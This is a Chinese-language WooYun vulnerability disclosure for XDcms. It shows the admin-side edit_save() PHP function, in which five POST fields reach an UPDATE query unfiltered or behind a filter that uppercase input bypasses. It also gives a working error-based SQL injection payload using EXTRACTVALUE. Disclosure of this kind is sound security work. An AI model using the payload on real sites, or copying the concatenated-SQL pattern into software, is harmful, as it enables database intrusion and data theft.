当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-051263

漏洞标题:XDcms Sql Injection 6-10

相关厂商:www.xdcms.cn

漏洞作者: HackBraid

提交时间:2014-02-18 12:43

修复时间:2014-05-19 12:44

公开时间:2014-05-19 12:44

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:10

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-02-18: 细节已通知厂商并且等待厂商处理中
2014-02-24: 厂商已经确认,细节仅向厂商公开
2014-02-27: 细节向第三方安全合作伙伴开放
2014-04-20: 细节向核心白帽子及相关领域专家公开
2014-04-30: 细节向普通白帽子公开
2014-05-10: 细节向实习白帽子公开
2014-05-19: 细节向公众公开

简要描述:

Sql Injection

详细说明:

注入在XDCMS企业管理系统后台的内容编辑处,\system\modules\xdcms\content.php文件:
这次出在编辑处,用到的函数是edit_save()

public function edit_save(){
$title=safe_html($_POST['title']);//第一处注入title字段,safe_html为过滤规则集,可被大写绕过进行注入
$commend=intval($_POST['commend']);
$username=safe_html($_POST['username']);//第二处注入username,大写可绕过过滤
$thumb=$_POST['thumb'];
$keywords=safe_html($_POST['keywords']);//第三处注入,同上
$description=safe_html($_POST['description']);//第四处注入,同上
$inputtime=$_POST['inputtime'];
$updatetime=strtotime($_POST['updatetime']);
$url=$_POST['url'];//第五处注入,没有safe_html过滤。
$catid=intval($_POST['catid']);
$id=intval($_POST['id']);
$fields=$_POST['fields'];
$style=$_POST['title_color']." ".$_POST['title_weight'];

if(empty($title)||empty($catid)||empty($inputtime)){
showmsg(C('material_not_complete'),'-1');
}

$model=modelname($catid);
$model_content=get_content_table($model);
if(empty($model)){
showmsg(C('error'),'-1');
}

$table=$this->mysql->show_table(); //判断数据表是否存在
if(!in_array(DB_PRE.$model,$table)){
showmsg(C('table_not_exist'),'-1');
}


//下面是更新content的sql语句,会将上边5个注入字段带入更新
$sql="update ".DB_PRE.$model." set title='{$title}',commend='{$commend}',username='{$username}',thumb='{$thumb}',keywords='{$keywords}',description='{$description}',updatetime='{$updatetime}',url='{$url}',style='{$style}' where id='{$id}'";
$this->mysql->query($sql);

漏洞证明:

1.以第一处注入为例,点击编辑:

xu.jpg


2.填写exp:

' AND EXTRACTVALUE(7028,CONCAT(0x5c,0x7177786771,(SELECT (CASE WHEN (7028=7028) THEN 1 ELSE 0 END)),0x71706b6b71)) AND 'PAKz'='PAKz


xu2.jpg


3.得到的注入数据:

xu1.jpg

修复方案:

过滤

版权声明:转载请注明来源 HackBraid@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:5

确认时间:2014-02-24 22:25

厂商回复:

老版本没有更新

最新状态:

暂无